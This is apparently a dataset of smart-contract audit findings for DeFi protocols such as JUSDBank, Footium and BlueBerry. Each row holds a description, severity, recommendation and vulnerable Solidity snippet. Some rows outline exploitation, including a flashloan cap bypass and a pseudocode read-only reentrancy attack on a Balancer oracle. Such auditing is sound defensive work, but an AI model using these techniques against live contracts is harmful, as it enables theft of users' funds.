JUSDErrors.REPAY_AMOUNT_IS_ZERO);\\n uint256 JUSDBorrowed = user.t0BorrowBalance.decimalMul(tRate);\\n uint256 tBorrowAmount;\\n uint256 t0Amount;\\n if (JUSDBorrowed <= amount) {\\n tBorrowAmount = JUSDBorrowed;\\n t0Amount = user.t0BorrowBalance;\\n } else {\\n tBorrowAmount = amount;\\n t0Amount = amount.decimalDiv(tRate);\\n }\\n IERC20(JUSD).safeTransferFrom(payer, address(this), tBorrowAmount);\\n user.t0BorrowBalance -= t0Amount;\\n t0TotalBorrowAmount -= t0Amount;\\n emit Repay(payer, to, tBorrowAmount);\\n return tBorrowAmount;\\n }\\n```\\n -UniswapPriceAdaptor fails after updating impactчmediumчThe `impact` variable can have a maximum value of `uint32` (=4.294.967.295) after updating. This is too low and will cause the `UniswapPriceAdaptor#getMarkPrice()` function to revert.\\nWhen initialized, the `impact` variable is a `uint256`. However, in the `updateImpact` function, the newImpact is a `uint32`.\\n```\\n function updateImpact(uint32 newImpact) external onlyOwner {\\n emit UpdateImpact(impact, newImpact);\\n impact = newImpact;\\n }\\n```\\n\\nThe new `impact` variable will be too small because in the getMarkPrice() function, we need diff * 1e18 / JOJOPriceFeed <= impact:\\n```\\n require(diff * 1e18 / JOJOPriceFeed <= impact, \"deviation is too big\");\\n```\\n\\nThe result of `diff * 1e18 / JOJOPriceFeed <= impact` is a number with e18 power. It is very likely that it is larger than the `impact` variable which is a `uint32`. 
The function getMarkPrice() will revert.чChange the newImpact argument from uint32 to uint256.\\n```\\n// Remove the line below\\n function updateImpact(uint32 newImpact) external onlyOwner {\\n// Add the line below\\n function updateImpact(uint256 newImpact) external onlyOwner { \\n emit UpdateImpact(impact, newImpact);\\n impact = newImpact;\\n }\\n```\\nчThe UniswapPriceAdaptor will malfunction and not return the price from Uniswap Oracle.ч```\\n function updateImpact(uint32 newImpact) external onlyOwner {\\n emit UpdateImpact(impact, newImpact);\\n impact = newImpact;\\n }\\n```\\n -In over liquidation, if the liquidatee has USDC-denominated assets for sale, the liquidator can buy the assets with USDC to avoid paying USDC to the liquidateeчmediumчIn over liquidation, if the liquidatee has USDC-denominated assets for sale, the liquidator can buy the assets with USDC to avoid paying USDC to the liquidatee\\nIn JUSDBank contract, if the liquidator wants to liquidate more collateral than the borrowings of the liquidatee, the liquidator can pay additional USDC to get the liquidatee's collateral.\\n```\\n } else {\\n // actualJUSD = actualCollateral * priceOff\\n // = JUSDBorrowed * priceOff / priceOff * (1-insuranceFeeRate)\\n // = JUSDBorrowed / (1-insuranceFeeRate)\\n // insuranceFee = actualJUSD * insuranceFeeRate\\n // = actualCollateral * priceOff * insuranceFeeRate\\n // = JUSDBorrowed * insuranceFeeRate / (1- insuranceFeeRate)\\n liquidateData.actualCollateral = JUSDBorrowed\\n .decimalDiv(priceOff)\\n .decimalDiv(JOJOConstant.ONE - reserve.insuranceFeeRate);\\n liquidateData.insuranceFee = JUSDBorrowed\\n .decimalMul(reserve.insuranceFeeRate)\\n .decimalDiv(JOJOConstant.ONE - reserve.insuranceFeeRate);\\n liquidateData.actualLiquidatedT0 = liquidatedInfo.t0BorrowBalance;\\n liquidateData.actualLiquidated = JUSDBorrowed;\\n }\\n\\n liquidateData.liquidatedRemainUSDC = (amount -\\n liquidateData.actualCollateral).decimalMul(price);\\n```\\n\\nThe liquidator 
needs to pay USDC in the callback and the JUSDBank contract will require the final USDC balance of the liquidatee to increase.\\n```\\n require(\\n IERC20(primaryAsset).balanceOf(liquidated) -\\n primaryLiquidatedAmount >=\\n liquidateData.liquidatedRemainUSDC,\\n JUSDErrors.LIQUIDATED_AMOUNT_NOT_ENOUGH\\n );\\n```\\n\\nIf the liquidatee has USDC-denominated assets for sale, the liquidator can purchase the assets with USDC in the callback, so that the liquidatee's USDC balance will increase and the liquidator will not need to send USDC to the liquidatee to pass the check in the JUSDBank contract.чConsider banning over liquidationчIn case of over liquidation, the liquidator does not need to pay additional USDC to the liquidateeч```\\n } else {\\n // actualJUSD = actualCollateral * priceOff\\n // = JUSDBorrowed * priceOff / priceOff * (1-insuranceFeeRate)\\n // = JUSDBorrowed / (1-insuranceFeeRate)\\n // insuranceFee = actualJUSD * insuranceFeeRate\\n // = actualCollateral * priceOff * insuranceFeeRate\\n // = JUSDBorrowed * insuranceFeeRate / (1- insuranceFeeRate)\\n liquidateData.actualCollateral = JUSDBorrowed\\n .decimalDiv(priceOff)\\n .decimalDiv(JOJOConstant.ONE - reserve.insuranceFeeRate);\\n liquidateData.insuranceFee = JUSDBorrowed\\n .decimalMul(reserve.insuranceFeeRate)\\n .decimalDiv(JOJOConstant.ONE - reserve.insuranceFeeRate);\\n liquidateData.actualLiquidatedT0 = liquidatedInfo.t0BorrowBalance;\\n liquidateData.actualLiquidated = JUSDBorrowed;\\n }\\n\\n liquidateData.liquidatedRemainUSDC = (amount -\\n liquidateData.actualCollateral).decimalMul(price);\\n```\\n -FlashLoanLiquidate.JOJOFlashLoan has no slippage control when swapping USDCчmediumчFlashLoanLiquidate.JOJOFlashLoan has no slippage control when swapping USDC\\nIn both GeneralRepay.repayJUSD and FlashLoanRepay.JOJOFlashLoan, the user-supplied minReceive parameter is used for slippage control when swapping USDC.\\n```\\n function JOJOFlashLoan(\\n address asset,\\n uint256 amount,\\n address 
to,\\n bytes calldata param\\n ) external {\\n (address approveTarget, address swapTarget, uint256 minReceive, bytes memory data) = abi\\n .decode(param, (address, address, uint256, bytes));\\n IERC20(asset).approve(approveTarget, amount);\\n (bool success, ) = swapTarget.call(data);\\n if (success == false) {\\n assembly {\\n let ptr := mload(0x40)\\n let size := returndatasize()\\n returndatacopy(ptr, 0, size)\\n revert(ptr, size)\\n }\\n }\\n uint256 USDCAmount = IERC20(USDC).balanceOf(address(this));\\n require(USDCAmount >= minReceive, \"receive amount is too small\");\\n// rest of code\\n function repayJUSD(\\n address asset,\\n uint256 amount,\\n address to,\\n bytes memory param\\n ) external {\\n IERC20(asset).safeTransferFrom(msg.sender, address(this), amount);\\n uint256 minReceive;\\n if (asset != USDC) {\\n (address approveTarget, address swapTarget, uint256 minAmount, bytes memory data) = abi\\n .decode(param, (address, address, uint256, bytes));\\n IERC20(asset).approve(approveTarget, amount);\\n (bool success, ) = swapTarget.call(data);\\n if (success == false) {\\n assembly {\\n let ptr := mload(0x40)\\n let size := returndatasize()\\n returndatacopy(ptr, 0, size)\\n revert(ptr, size)\\n }\\n }\\n minReceive = minAmount;\\n }\\n\\n uint256 USDCAmount = IERC20(USDC).balanceOf(address(this));\\n require(USDCAmount >= minReceive, \"receive amount is too small\");\\n```\\n\\nHowever, this is not done in FlashLoanLiquidate.JOJOFlashLoan, and the lack of slippage control may expose the user to sandwich attacks when swapping USDC.чConsider making FlashLoanLiquidate.JOJOFlashLoan use the minReceive parameter for slippage control when swapping USDC.чThe lack of slippage control may expose the user to sandwich attacks when swapping USDC.ч```\\n function JOJOFlashLoan(\\n address asset,\\n uint256 amount,\\n address to,\\n bytes calldata param\\n ) external {\\n (address approveTarget, address swapTarget, uint256 minReceive, bytes memory data) = abi\\n 
.decode(param, (address, address, uint256, bytes));\\n IERC20(asset).approve(approveTarget, amount);\\n (bool success, ) = swapTarget.call(data);\\n if (success == false) {\\n assembly {\\n let ptr := mload(0x40)\\n let size := returndatasize()\\n returndatacopy(ptr, 0, size)\\n revert(ptr, size)\\n }\\n }\\n uint256 USDCAmount = IERC20(USDC).balanceOf(address(this));\\n require(USDCAmount >= minReceive, \"receive amount is too small\");\\n// rest of code\\n function repayJUSD(\\n address asset,\\n uint256 amount,\\n address to,\\n bytes memory param\\n ) external {\\n IERC20(asset).safeTransferFrom(msg.sender, address(this), amount);\\n uint256 minReceive;\\n if (asset != USDC) {\\n (address approveTarget, address swapTarget, uint256 minAmount, bytes memory data) = abi\\n .decode(param, (address, address, uint256, bytes));\\n IERC20(asset).approve(approveTarget, amount);\\n (bool success, ) = swapTarget.call(data);\\n if (success == false) {\\n assembly {\\n let ptr := mload(0x40)\\n let size := returndatasize()\\n returndatacopy(ptr, 0, size)\\n revert(ptr, size)\\n }\\n }\\n minReceive = minAmount;\\n }\\n\\n uint256 USDCAmount = IERC20(USDC).balanceOf(address(this));\\n require(USDCAmount >= minReceive, \"receive amount is too small\");\\n```\\n -JUSDBank users can bypass individual collateral borrow limitsчmediumчJUSDBank imposes individual borrow caps on each collateral. 
The issue is that this can be bypassed due to the fact that withdraw and borrow use different methods to determine if an account is safe.\n```\n function borrow(\n uint256 amount,\n address to,\n bool isDepositToJOJO\n ) external override nonReentrant nonFlashLoanReentrant{\n // t0BorrowedAmount = borrowedAmount / getT0Rate\n DataTypes.UserInfo storage user = userInfo[msg.sender];\n _borrow(user, isDepositToJOJO, to, amount, msg.sender);\n require(\n _isAccountSafeAfterBorrow(user, getTRate()),\n JUSDErrors.AFTER_BORROW_ACCOUNT_IS_NOT_SAFE\n );\n }\n```\n\nWhen borrowing the contract calls _isAccountSafeAfterBorrow. This imposes a max borrow on each collateral type that guarantees that the user cannot borrow more than the max for each collateral type. The issue is that withdraw doesn't impose this cap. This allows a user to bypass this cap as shown in the example below.\nExample: Assume WETH and WBTC both have a cap of 10,000 borrow. The user deposits $30,000 WETH and takes a flashloan for $30,000 WBTC. Now they deposit both and borrow 20,000 JUSD. They then withdraw all their WBTC to repay the flashloan and now they have borrowed 20,000 against $30000 in WETH
While this is fine for users that are repaying their own debt this is not good when repaying for another user. Additionally, specifying an excess `to` repay is basically a requirement when attempting `to` pay off the entire balance of an account. This combination of factors will make it very likely that funds will be refunded incorrectly.\\n```\\n IERC20(USDC).approve(jusdExchange, borrowBalance);\\n IJUSDExchange(jusdExchange).buyJUSD(borrowBalance, address(this));\\n IERC20(USDC).safeTransfer(to, USDCAmount - borrowBalance);\\n JUSDAmount = borrowBalance;\\n }\\n```\\n\\nAs seen above, when there is an excess amount of USDC, it is transferred `to` the `to` address which is the recipient of the repay. When `to` != msg.sender all excess will be sent `to` the recipient of the repay rather than being refunded `to` the caller.чEither send the excess back to the caller or allow them to specify where the refund goesчRefund is sent to the wrong address if to != msg.senderч```\\n IERC20(USDC).approve(jusdExchange, borrowBalance);\\n IJUSDExchange(jusdExchange).buyJUSD(borrowBalance, address(this));\\n IERC20(USDC).safeTransfer(to, USDCAmount - borrowBalance);\\n JUSDAmount = borrowBalance;\\n }\\n```\\n -Certain ERC20 token does not return bool from approve and transfer and transaction revertчmediumчCertain ERC20 token does not return bool from approve and transfer and transaction revert\\nAccording to\\nSome tokens do not return a bool on ERC20 methods and use IERC20 token interface will revert transaction\\nCertain ERC20 token does not return bool from approve and transfer and transaction revert\\n```\\n function setApprovalForERC20(\\n IERC20 erc20Contract,\\n address to,\\n uint256 amount\\n ) external onlyClubOwner {\\n erc20Contract.approve(to, amount);\\n }\\n```\\n\\nand\\n```\\nfunction transferERC20(\\n IERC20 erc20Contract,\\n address to,\\n uint256 amount\\n) external onlyClubOwner {\\n erc20Contract.transfer(to, amount);\\n}\\n```\\n\\nthe transfer / approve 
can fail silentlyчIssue Certain ERC20 token does not return bool from approve and transfer and transaction revert\nUse Openzeppelin SafeTransfer / SafeApproveчSome tokens do not return a bool on ERC20 methods and use IERC20 token interface will revert transactionч```\n function setApprovalForERC20(\n IERC20 erc20Contract,\n address to,\n uint256 amount\n ) external onlyClubOwner {\n erc20Contract.approve(to, amount);\n }\n```\n -Users might lose funds as `claimERC20Prize()` doesn't revert for no-revert-on-transfer tokensчmediumчUsers can call `claimERC20Prize()` without actually receiving tokens if a no-revert-on-failure token is used, causing a portion of their claimable tokens to become unclaimable.\nIn the `FootiumPrizeDistributor` contract, whitelisted users can call `claimERC20Prize()` to claim ERC20 tokens. The function adds the amount of tokens claimed to the user's total claim amount, and then transfers the tokens to the user:\nFootiumPrizeDistributor.sol#L128-L131\n```\nif (value > 0) {\n totalERC20Claimed[_token][_to] += value;\n _token.transfer(_to, value);\n}\n```\n\nAs the return value from `transfer()` is not checked, `claimERC20Prize()` does not revert even when the transfer of tokens to the user fails.\nThis could potentially cause users to lose assets when:\n`_token` is a no-revert-on-failure token.\nThe user calls `claimERC20Prize()` with `value` higher than the contract's token balance.\nAs the contract has an insufficient balance, `transfer()` will revert and the user receives no tokens. However, as `claimERC20Prize()` succeeds, `totalERC20Claimed` is permanently increased for the user, thus the user cannot claim these tokens again.
These tokens become permanently unclaimable for the user, leading to a loss of funds.ч```\\nif (value > 0) {\\n totalERC20Claimed[_token][_to] += value;\\n _token.transfer(_to, value);\\n}\\n```\\n -Users can bypass Player royalties on EIP2981 compatible markets by selling clubs as a wholeчmediumчPlayers have a royalty built in but clubs do not. This allows bulk sale of players via clubs to bypass the fee when selling players.\\nFootiumPlayer.sol#L16-L23\\n```\\ncontract FootiumPlayer is\\n ERC721Upgradeable,\\n AccessControlUpgradeable,\\n ERC2981Upgradeable,\\n PausableUpgradeable,\\n ReentrancyGuardUpgradeable,\\n OwnableUpgradeable\\n{\\n```\\n\\nFootiumPlayer implements the EIP2981 standard which creates fees when buy/selling the players.\\nFootiumClub.sol#L15-L21\\n```\\ncontract FootiumClub is\\n ERC721Upgradeable,\\n AccessControlUpgradeable,\\n PausableUpgradeable,\\n ReentrancyGuardUpgradeable,\\n OwnableUpgradeable\\n{\\n```\\n\\nFootiumClub on the other hand never implements this standard. 
This allows users to sell players by selling their club to avoid any kind of fee on player sales.чImplement EIP2981 on clubs as wellчUsers can bypass fees on player sales by selling club insteadч```\\ncontract FootiumPlayer is\\n ERC721Upgradeable,\\n AccessControlUpgradeable,\\n ERC2981Upgradeable,\\n PausableUpgradeable,\\n ReentrancyGuardUpgradeable,\\n OwnableUpgradeable\\n{\\n```\\n -Merkle leaf values for _clubDivsMerkleRoot are 64 bytes before hashing which can lead to merkle tree collisionsчmediumчFootiumAcademy hashes 64 bytes when calculating leaf allowing it to collide with the internal nodes of the merkle tree.\\nMerkleProofUpgradeable.sol puts the following warning at the beginning of the contract:\\n```\\n * WARNING: You should avoid using leaf values that are 64 bytes long prior to\\n * hashing, or use a hash function other than keccak256 for hashing leaves.\\n * This is because the concatenation of a sorted pair of internal nodes in\\n * the merkle tree could be reinterpreted as a leaf value.\\n```\\n\\nFootiumAcademy.sol#L235-L240\\n```\\n if (\\n !MerkleProofUpgradeable.verify(\\n divisionProof,\\n _clubDivsMerkleRoot,\\n keccak256(abi.encodePacked(clubId, divisionTier)) <- @audit-issue 64 bytes before hashing allows collisions with internal nodes\\n )\\n```\\n\\nThis is problematic because FootiumAcademy uses clubId and divisionTier as the base of the leaf, which are both uint256 (32 bytes each for 64 bytes total). This allows collision between leaves and internal nodes. 
These collisions could allow users to mint to divisions that otherwise would be impossible.чUse a combination of variables that doesn't sum to 64 bytesчUsers can abuse merkle tree collisions to mint in non-existent divisions and bypass minting feesч```\\n * WARNING: You should avoid using leaf values that are 64 bytes long prior to\\n * hashing, or use a hash function other than keccak256 for hashing leaves.\\n * This is because the concatenation of a sorted pair of internal nodes in\\n * the merkle tree could be reinterpreted as a leaf value.\\n```\\n -AuraSpell#openPositionFarm uses incorrect join type for balancerчhighчThe JoinPoolRequest uses \"\" for userData meaning that it will decode into 0. This is problematic because join requests of type 0 are \"init\" type joins and will revert for pools that are already initialized.\\n```\\nenum JoinKind { INIT, EXACT_TOKENS_IN_FOR_BPT_OUT, TOKEN_IN_FOR_EXACT_BPT_OUT }\\n```\\n\\nWe see above that enum JoinKind is INIT for 0 values.\\n```\\n return _joinExactTokensInForBPTOut(balances, normalizedWeights, userData);\\n } else if (kind == JoinKind.TOKEN_IN_FOR_EXACT_BPT_OUT) {\\n return _joinTokenInForExactBPTOut(balances, normalizedWeights, userData);\\n } else {\\n _revert(Errors.UNHANDLED_JOIN_KIND);\\n }\\n```\\n\\nHere user data is decoded into join type and since it is \"\" it will decode to type 0 which will result in a revert.чUses JoinKind = 1 for user dataчUsers will be unable to open any farm position on AuraSpellч```\\nenum JoinKind { INIT, EXACT_TOKENS_IN_FOR_BPT_OUT, TOKEN_IN_FOR_EXACT_BPT_OUT }\\n```\\n -Users are forced to swap all reward tokens with no slippage protectionчhighчAuraSpell forces users to swap their reward tokens to debt token but doesn't allow them to specify any slippage values.\\nAuraSpell.sol#L193-L203\\n```\\n for (uint256 i = 0; i < rewardTokens.length; i++) {\\n uint256 rewards = _doCutRewardsFee(rewardTokens[i]);\\n _ensureApprove(rewardTokens[i], address(swapRouter), rewards);\\n 
swapRouter.swapExactTokensForTokens(\\n rewards,\\n 0,\\n swapPath[i],\\n address(this),\\n type(uint256).max\\n );\\n }\\n```\\n\\nAbove all reward tokens are swapped and always use 0 for min out meaning that deposits will be sandwiched and stolen.чAllow user to specify slippage parameters for all reward tokensчAll reward tokens can be sandwiched and stolenч```\\n for (uint256 i = 0; i < rewardTokens.length; i++) {\\n uint256 rewards = _doCutRewardsFee(rewardTokens[i]);\\n _ensureApprove(rewardTokens[i], address(swapRouter), rewards);\\n swapRouter.swapExactTokensForTokens(\\n rewards,\\n 0,\\n swapPath[i],\\n address(this),\\n type(uint256).max\\n );\\n }\\n```\\n -ConvexSpell#closePositionFarm removes liquidity without any slippage protectionчhighчConvexSpell#closePositionFarm removes liquidity without any slippage protection allowing withdraws to be sandwiched and stolen. Curve liquidity has historically been strong but for smaller pairs their liquidity is getting low enough that it can be manipulated via flashloans.\\nConvexSpell.sol#L204-L208\\n```\\n ICurvePool(pool).remove_liquidity_one_coin(\\n amountPosRemove,\\n int128(tokenIndex),\\n 0\\n );\\n```\\n\\nLiquidity is removed as a single token which makes it vulnerable to sandwich attacks but no slippage protection is implemented. 
The same issue applies to CurveSpell.чIssue ConvexSpell#closePositionFarm removes liquidity without any slippage protection\\nAllow user to specify min outчUser withdrawals can be sandwichedч```\\n ICurvePool(pool).remove_liquidity_one_coin(\\n amountPosRemove,\\n int128(tokenIndex),\\n 0\\n );\\n```\\n -WAuraPools will irreversibly break if reward tokens are added to pool after depositчhighчWAuraPools will irreversibly break if reward tokens are added to pool after deposit due to an OOB error on accExtPerShare.\\nWAuraPools.sol#L166-L189\\n```\\n uint extraRewardsCount = IAuraRewarder(crvRewarder)\\n .extraRewardsLength(); <- @audit-issue rewardTokenCount pulled fresh\\n tokens = new address[](extraRewardsCount + 1);\\n rewards = new uint256[](extraRewardsCount + 1);\\n\\n tokens[0] = IAuraRewarder(crvRewarder).rewardToken();\\n rewards[0] = _getPendingReward(\\n stCrvPerShare,\\n crvRewarder,\\n amount,\\n lpDecimals\\n );\\n\\n for (uint i = 0; i < extraRewardsCount; i++) {\\n address rewarder = IAuraRewarder(crvRewarder).extraRewards(i);\\n\\n @audit-issue attempts to pull from array which will be too small if tokens are added\\n uint256 stRewardPerShare = accExtPerShare[tokenId][i];\\n tokens[i + 1] = IAuraRewarder(rewarder).rewardToken();\\n rewards[i + 1] = _getPendingReward(\\n stRewardPerShare,\\n rewarder,\\n amount,\\n lpDecimals\\n );\\n }\\n```\\n\\naccExtPerShare stores the current rewardPerToken when the position is first created. It stores it as an array and only stores values for reward tokens that have been added prior to minting. 
This creates an issue if a reward token is added because now it will attempt to pull a value for an index that doesn't exist and throw an OOB error.\\nThis is problematic because pendingRewards is called every single transaction via the isLiquidatable subcall in BlueBerryBank#execute.чUse a mapping rather than an array to store valuesчWAuraPools will irreversibly break if reward tokens are added to pool afterч```\\n uint extraRewardsCount = IAuraRewarder(crvRewarder)\\n .extraRewardsLength(); <- @audit-issue rewardTokenCount pulled fresh\\n tokens = new address[](extraRewardsCount + 1);\\n rewards = new uint256[](extraRewardsCount + 1);\\n\\n tokens[0] = IAuraRewarder(crvRewarder).rewardToken();\\n rewards[0] = _getPendingReward(\\n stCrvPerShare,\\n crvRewarder,\\n amount,\\n lpDecimals\\n );\\n\\n for (uint i = 0; i < extraRewardsCount; i++) {\\n address rewarder = IAuraRewarder(crvRewarder).extraRewards(i);\\n\\n @audit-issue attempts to pull from array which will be too small if tokens are added\\n uint256 stRewardPerShare = accExtPerShare[tokenId][i];\\n tokens[i + 1] = IAuraRewarder(rewarder).rewardToken();\\n rewards[i + 1] = _getPendingReward(\\n stRewardPerShare,\\n rewarder,\\n amount,\\n lpDecimals\\n );\\n }\\n```\\n -UserData for balancer pool exits is malformed and will permanently trap usersчhighчUserData for balancer pool exits is malformed and will result in all withdrawal attempts failing, trapping the user permanently.\\nAuraSpell.sol#L184-L189\\n```\\nwAuraPools.getVault(lpToken).exitPool(\\n IBalancerPool(lpToken).getPoolId(),\\n address(this),\\n address(this),\\n IBalancerVault.ExitPoolRequest(tokens, minAmountsOut, \"\", false)\\n);\\n```\\n\\nWe see above that UserData is encoded as \"\". 
This is problematic as it doesn't contain the proper data for exiting the pool, causing all exit request to fail and trap the user permanently.\\n```\\nfunction exactBptInForTokenOut(bytes memory self) internal pure returns (uint256 bptAmountIn, uint256 tokenIndex) {\\n (, bptAmountIn, tokenIndex) = abi.decode(self, (WeightedPool.ExitKind, uint256, uint256));\\n}\\n```\\n\\nUserData is decoded into the data shown above when using ExitKind = 0. Since the exit uses \"\" as the user data this will be decoded as 0 a.k.a EXACT_BPT_IN_FOR_ONE_TOKEN_OUT. This is problematic because the token index and bptAmountIn should also be encoded in user data for this kind of exit. Since it isn't the exit call will always revert and the user will be permanently trapped.чEncode the necessary exit data in userDataчUsers will be permanently trapped, unable to withdrawч```\\nwAuraPools.getVault(lpToken).exitPool(\\n IBalancerPool(lpToken).getPoolId(),\\n address(this),\\n address(this),\\n IBalancerVault.ExitPoolRequest(tokens, minAmountsOut, \"\", false)\\n);\\n```\\n -UniswapV3 sqrtRatioLimit doesn't provide slippage protection and will result in partial swapsчhighчThe sqrtRatioLimit for UniV3 doesn't cause the swap to revert upon reaching that value. Instead it just cause the swap to partially fill. This is a known issue with using sqrtRatioLimit as can be seen here where the swap ends prematurely when it has been reached. This is problematic as this is meant to provide the user with slippage protection but doesn't.\\n```\\n if (amountToSwap > 0) {\\n SWAP_POOL = IUniswapV3Pool(vault.pool());\\n uint160 deltaSqrt = (param.sqrtRatioLimit *\\n uint160(param.sellSlippage)) / uint160(Constants.DENOMINATOR);\\n SWAP_POOL.swap(\\n address(this),\\n // if withdraw token is Token0, then swap token1 -> token0 (false)\\n !isTokenA,\\n amountToSwap.toInt256(),\\n isTokenA\\n ? 
param.sqrtRatioLimit + deltaSqrt\\n : param.sqrtRatioLimit - deltaSqrt, // slippaged price cap\\n abi.encode(address(this))\\n );\\n }\\n```\\n\\nsqrtRatioLimit is used as slippage protection for the user but is ineffective and depending on what tokens are being swapped, tokens may be left the in the contract which can be stolen by anyone.чCheck the amount received from the swap and compare it against some user supplied minimumчIncorrect slippage application can result in partial swaps and loss of fundsч```\\n if (amountToSwap > 0) {\\n SWAP_POOL = IUniswapV3Pool(vault.pool());\\n uint160 deltaSqrt = (param.sqrtRatioLimit *\\n uint160(param.sellSlippage)) / uint160(Constants.DENOMINATOR);\\n SWAP_POOL.swap(\\n address(this),\\n // if withdraw token is Token0, then swap token1 -> token0 (false)\\n !isTokenA,\\n amountToSwap.toInt256(),\\n isTokenA\\n ? param.sqrtRatioLimit + deltaSqrt\\n : param.sqrtRatioLimit - deltaSqrt, // slippaged price cap\\n abi.encode(address(this))\\n );\\n }\\n```\\n -Balance check for swapToken in ShortLongSpell#_deposit is incorrect and will result in nonfunctional contractчhighчThe balance checks on ShortLongSpell#_withdraw are incorrect and will make contract basically nonfunctional\\nswapToken is always vault.uToken. borrowToken is always required to be vault.uToken which means that swapToken == borrowToken. This means that the token borrowed is always required to be swapped.\\nShortLongSpell.sol#L83-L89\\n```\\n uint256 strTokenAmt = _doBorrow(param.borrowToken, param.borrowAmount);\\n\\n // 3. Swap borrowed token to strategy token\\n IERC20Upgradeable swapToken = ISoftVault(strategy.vault).uToken();\\n // swapData.fromAmount = strTokenAmt;\\n PSwapLib.megaSwap(augustusSwapper, tokenTransferProxy, swapData);\\n strTokenAmt = swapToken.balanceOf(address(this)) - strTokenAmt; <- @audit-issue will always revert on swap\\n```\\n\\nBecause swapToken == borrowToken if there is ever a swap then the swapToken balance will decrease. 
This causes L89 to always revert when a swap happens, making the contract completely non-functionalчRemove checkчShortLongSpell is nonfunctionalч```\\n uint256 strTokenAmt = _doBorrow(param.borrowToken, param.borrowAmount);\\n\\n // 3. Swap borrowed token to strategy token\\n IERC20Upgradeable swapToken = ISoftVault(strategy.vault).uToken();\\n // swapData.fromAmount = strTokenAmt;\\n PSwapLib.megaSwap(augustusSwapper, tokenTransferProxy, swapData);\\n strTokenAmt = swapToken.balanceOf(address(this)) - strTokenAmt; <- @audit-issue will always revert on swap\\n```\\n -ShortLongSpell#openPosition can cause user unexpected liquidation when increasing position sizeчhighчWhen increasing a position, all collateral is sent to the user rather than being kept in the position. This can cause serious issues because this collateral keeps the user from being liquidated. It may unexpectedly leave the user on the brink of liquidation where a small change in price leads to their liquidation.\\nShortLongSpell.sol#L129-L141\\n```\\n {\\n IBank.Position memory pos = bank.getCurrentPositionInfo();\\n address posCollToken = pos.collToken;\\n uint256 collSize = pos.collateralSize;\\n address burnToken = address(ISoftVault(strategy.vault).uToken());\\n if (collSize > 0) {\\n if (posCollToken != address(wrapper))\\n revert Errors.INCORRECT_COLTOKEN(posCollToken);\\n bank.takeCollateral(collSize);\\n wrapper.burn(burnToken, collSize);\\n _doRefund(burnToken);\\n }\\n }\\n```\\n\\nIn the above lines we can see that all collateral is burned and the user is sent the underlying tokens. 
This is problematic as it sends all the collateral to the user, leaving the position collateralized by only the isolated collateral.\\nBest case the user's transaction reverts but worst case they will be liquidated almost immediately.чDon't burn the collateralчUnfair liquidation for usersч```\\n {\\n IBank.Position memory pos = bank.getCurrentPositionInfo();\\n address posCollToken = pos.collToken;\\n uint256 collSize = pos.collateralSize;\\n address burnToken = address(ISoftVault(strategy.vault).uToken());\\n if (collSize > 0) {\\n if (posCollToken != address(wrapper))\\n revert Errors.INCORRECT_COLTOKEN(posCollToken);\\n bank.takeCollateral(collSize);\\n wrapper.burn(burnToken, collSize);\\n _doRefund(burnToken);\\n }\\n }\\n```\\n -Pending CRV rewards are not accounted for and can cause unfair liquidationsчhighчpendingRewards are factored into the health of a position so that the position collateral is fairly assessed. However WCurveGauge#pendingRewards doesn't return the proper reward tokens/amounts meaning that positions aren't valued correctly and users can be unfairly liquidated.\\nBlueBerryBank.sol#L408-L413\\n```\\n (address[] memory tokens, uint256[] memory rewards) = IERC20Wrapper(\\n pos.collToken\\n ).pendingRewards(pos.collId, pos.collateralSize);\\n for (uint256 i; i < tokens.length; i++) {\\n rewardsValue += oracle.getTokenValue(tokens[i], rewards[i]);\\n }\\n```\\n\\nWhen BlueBerryBank is valuing a position it also values the pending rewards since they also have value.\\nWCurveGauge.sol#L106-L114\\n```\\nfunction pendingRewards(\\n uint256 tokenId,\\n uint256 amount\\n)\\n public\\n view\\n override\\n returns (address[] memory tokens, uint256[] memory rewards)\\n{}\\n```\\n\\nAbove we see that WCurveGauge#pendingRewards returns empty arrays when called. 
This means that pending rewards are not factored in correctly and users can be liquidated when even when they should be safe.чChange WCurveGauge#pendingRewards to correctly return the pending rewardsчUser is liquidated when they shouldn't beч```\\n (address[] memory tokens, uint256[] memory rewards) = IERC20Wrapper(\\n pos.collToken\\n ).pendingRewards(pos.collId, pos.collateralSize);\\n for (uint256 i; i < tokens.length; i++) {\\n rewardsValue += oracle.getTokenValue(tokens[i], rewards[i]);\\n }\\n```\\n -`BalancerPairOracle` can be manipulated using read-only reentrancyчhighч`BalancerPairOracle.getPrice` makes an external call to `BalancerVault.getPoolTokens` without checking the Balancer Vault's reentrancy guard. As a result, the oracle can be trivially manipulated to liquidate user positions prematurely.\\nIn February, the Balancer team disclosed a read-only reentrancy vulnerability in the Balancer Vault. The detailed disclosure can be found here. In short, all Balancer pools are susceptible to manipulation of their external queries, and all integrations must now take an extra step of precaution when consuming data. Via reentrancy, an attacker can force token balances and BPT supply to be out of sync, creating very inaccurate BPT prices.\\nSome protocols, such as Sentiment, remained unaware of this issue for a few months and were later hacked as a result.\\n`BalancerPairOracle.getPrice` makes a price calculation of the form `f(balances) / pool.totalSupply()`, so it is clearly vulnerable to synchronization issues between the two data points. 
A rough outline of the attack might look like this:\\n```\\nAttackerContract.flashLoan() ->\\n // Borrow lots of tokens and trigger a callback.\\n SomeProtocol.flashLoan() ->\\n AttackerContract.exploit()\\n\\nAttackerContract.exploit() ->\\n // Join a Balancer Pool using the borrowed tokens and send some ETH along with the call.\\n BalancerVault.joinPool() ->\\n // The Vault will return the excess ETH to the sender, which will reenter this contract.\\n // At this point in the execution, the BPT supply has been updated but the token balances have not.\\n AttackerContract.receive()\\n\\nAttackerContract.receive() ->\\n // Liquidate a position using the same Balancer Pool as collateral.\\n BlueBerryBank.liquidate() ->\\n // Call to the oracle to check the price.\\n BalancerPairOracle.getPrice() ->\\n // Query the token balances. At this point in the execution, these have not been updated (see above).\\n // So, the balances are still the same as before the start of the large pool join.\\n BalancerVaul.getPoolTokens()\\n\\n // Query the BPT supply. At this point in the execution, the supply has already been updated (see above).\\n // So, it includes the latest large pool join, and as such the BPT supply has grown by a large amount.\\n BalancerPool.getTotalSupply()\\n\\n // Now the price is computed using both balances and supply, and the result is much smaller than it should be.\\n price = f(balances) / pool.totalSupply()\\n\\n // The position is liquidated under false pretenses.\\n```\\nчThe Balancer team recommends utilizing their official library to safeguard queries such as `Vault.getPoolTokens`. However, the library makes a state-modifying call to the Balancer Vault, so it is not suitable for `view` functions such as `BalancerPairOracle.getPrice`. There are then two options:\\nInvoke the library somewhere else. 
